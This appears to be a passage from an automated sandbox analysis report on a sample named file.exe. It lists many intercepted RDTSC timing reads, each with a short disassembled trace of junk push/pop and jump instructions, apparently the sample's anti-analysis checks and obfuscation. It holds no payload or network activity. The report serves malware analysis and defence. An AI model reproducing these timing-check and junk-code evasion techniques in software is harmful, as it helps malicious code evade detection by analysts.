                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80161 second address: 4C80167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80167 second address: 4C8017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC150h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8017B second address: 4C8017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8017F second address: 4C801F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0F34BEC14Dh 0x00000012 sbb eax, 5C9434B6h 0x00000018 jmp 00007F0F34BEC151h 0x0000001d popfd 0x0000001e jmp 00007F0F34BEC150h 0x00000023 popad 0x00000024 and dword ptr [eax], 00000000h 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b pushfd 0x0000002c jmp 00007F0F34BEC14Ah 0x00000031 sbb ecx, 6ABEDF08h 0x00000037 jmp 00007F0F34BEC14Bh 0x0000003c popfd 0x0000003d popad 0x0000003e and dword ptr [eax+04h], 00000000h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov ecx, ebx 0x00000047 mov si, dx 0x0000004a popad 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C801F4 second address: 4C801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70CD1 second address: 4C70CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70CE2 second address: 4C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70CE6 second address: 4C70D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC153h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70F85 second address: 4C70F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02B7 second address: 4CA02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC155h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02F2 second address: 4CA02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02F8 second address: 4CA034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC150h 0x00000011 and eax, 1F647128h 0x00000017 jmp 00007F0F34BEC14Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F0F34BEC156h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0F34BEC14Eh 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA034F second address: 4CA039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov al, 73h 0x0000000d movsx ebx, si 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 jmp 00007F0F345319F8h 0x0000001b test eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F345319F7h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA039E second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0FA6E7F6F1h 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 mov si, 8C8Fh 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0F34BEC151h 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03FC second address: 4CA0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0400 second address: 4CA0406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0406 second address: 4CA0458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d jmp 00007F0F34BEC154h 0x00000012 pushfd 0x00000013 jmp 00007F0F34BEC152h 0x00000018 add ch, 00000028h 0x0000001b jmp 00007F0F34BEC14Bh 0x00000020 popfd 0x00000021 popad 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0458 second address: 4CA045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA045C second address: 4CA0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0462 second address: 4CA0468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0468 second address: 4CA046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA046C second address: 4CA04BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007F0F345319F0h 0x0000000e retn 0004h 0x00000011 nop 0x00000012 mov esi, eax 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 xor esi, dword ptr [00A42014h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 call 00007F0F387D1DAEh 0x00000029 push FFFFFFFEh 0x0000002b pushad 0x0000002c mov ebx, 5E8B5FD0h 0x00000031 popad 0x00000032 pop eax 0x00000033 jmp 00007F0F345319EFh 0x00000038 ret 0x00000039 nop 0x0000003a push eax 0x0000003b call 00007F0F387D1DC1h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 movzx eax, bx 0x00000046 call 00007F0F345319F1h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA04BB second address: 4CA0514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esp 0x00000007 pushad 0x00000008 movzx ecx, bx 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC155h 0x00000011 sbb ecx, 31BDE066h 0x00000017 jmp 00007F0F34BEC151h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0F34BEC158h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0514 second address: 4CA051A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50050 second address: 4C5006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC151h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5006F second address: 4C50084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50084 second address: 4C50094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50094 second address: 4C500A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EAh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500A9 second address: 4C500AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500AF second address: 4C500E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0F345319EEh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F345319EAh 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500E3 second address: 4C500F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500F2 second address: 4C5011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007F0F345319EBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F345319F5h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5011D second address: 4C50190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC157h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F0F34BEC150h 0x00000013 pop esi 0x00000014 call 00007F0F34BEC14Bh 0x00000019 pop ecx 0x0000001a popad 0x0000001b push edx 0x0000001c mov edi, eax 0x0000001e pop ecx 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 jmp 00007F0F34BEC157h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F34BEC155h 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50190 second address: 4C50196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50196 second address: 4C5019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5019A second address: 4C501A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501A8 second address: 4C501B9 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, D0h 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, dx 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501B9 second address: 4C501CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501CC second address: 4C50211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f mov ecx, 5EA97883h 0x00000014 mov dh, ah 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F34BEC157h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50211 second address: 4C50217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50217 second address: 4C5021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5021B second address: 4C50235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50235 second address: 4C50239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50239 second address: 4C5023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50361 second address: 4C50370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50370 second address: 4C5044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F0F345319F1h 0x00000012 test edx, 61000000h 0x00000018 jmp 00007F0F345319EEh 0x0000001d jne 00007F0FA680FCCCh 0x00000023 jmp 00007F0F345319F0h 0x00000028 test byte ptr [esi+48h], 00000001h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F0F345319EEh 0x00000033 adc esi, 3FC30268h 0x00000039 jmp 00007F0F345319EBh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007F0F345319F8h 0x00000045 sub eax, 284FD4C8h 0x0000004b jmp 00007F0F345319EBh 0x00000050 popfd 0x00000051 popad 0x00000052 jne 00007F0FA680FC7Dh 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F0F345319F4h 0x0000005f jmp 00007F0F345319F5h 0x00000064 popfd 0x00000065 mov bl, ah 0x00000067 popad 0x00000068 test bl, 00000007h 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e mov esi, 024CC12Bh 0x00000073 movzx eax, bx 0x00000076 popad 0x00000077 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5044E second address: 4C5046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC159h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40706 second address: 4C40779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov di, cx 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F0F345319EFh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0F345319F6h 0x0000001d mov ebp, esp 0x0000001f jmp 00007F0F345319F0h 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F345319F7h 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40779 second address: 4C407B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC158h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407B3 second address: 4C407B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407B7 second address: 4C407BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407BD second address: 4C407D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407D6 second address: 4C407DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407DA second address: 4C407E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407E0 second address: 4C40871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0F34BEC155h 0x00000009 xor ah, FFFFFF86h 0x0000000c jmp 00007F0F34BEC151h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0F34BEC150h 0x00000018 jmp 00007F0F34BEC155h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, 762DF36Eh 0x0000002a pushfd 0x0000002b jmp 00007F0F34BEC14Fh 0x00000030 xor cx, 141Eh 0x00000035 jmp 00007F0F34BEC159h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40871 second address: 4C40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40877 second address: 4C4087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4087B second address: 4C4088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4088A second address: 4C4089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4089B second address: 4C408F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, CBh 0x00000005 mov ecx, 37A428BFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 pushad 0x00000011 push esi 0x00000012 mov si, bx 0x00000015 pop edx 0x00000016 jmp 00007F0F345319F8h 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F0F345319EDh 0x00000028 xor ecx, 7AD687C6h 0x0000002e jmp 00007F0F345319F1h 0x00000033 popfd 0x00000034 mov ah, 2Ch 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C408F9 second address: 4C408FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C408FF second address: 4C40903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40903 second address: 4C40907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40907 second address: 4C40919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40919 second address: 4C40929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC14Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40929 second address: 4C4093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EBh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4093F second address: 4C409A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F34BEC14Fh 0x00000008 pop eax 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F0FA6ED1B7Ch 0x00000015 pushad 0x00000016 call 00007F0F34BEC14Eh 0x0000001b pushfd 0x0000001c jmp 00007F0F34BEC152h 0x00000021 and ax, 9788h 0x00000026 jmp 00007F0F34BEC14Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d pushad 0x0000002e mov cx, bx 0x00000031 mov cx, bx 0x00000034 popad 0x00000035 popad 0x00000036 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C409A8 second address: 4C409AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C409AC second address: 4C409B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C409B2 second address: 4C40A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8732h 0x00000007 call 00007F0F345319F3h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ecx, esi 0x00000012 jmp 00007F0F345319EFh 0x00000017 je 00007F0FA68173A8h 0x0000001d jmp 00007F0F345319F6h 0x00000022 test byte ptr [76FB6968h], 00000002h 0x00000029 jmp 00007F0F345319F0h 0x0000002e jne 00007F0FA6817388h 0x00000034 pushad 0x00000035 movzx esi, bx 0x00000038 jmp 00007F0F345319F3h 0x0000003d popad 0x0000003e mov edx, dword ptr [ebp+0Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F0F345319F5h 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A4C second address: 4C40A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A68 second address: 4C40A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A6C second address: 4C40A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A72 second address: 4C40A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F345319EEh 0x00000011 rdtsc
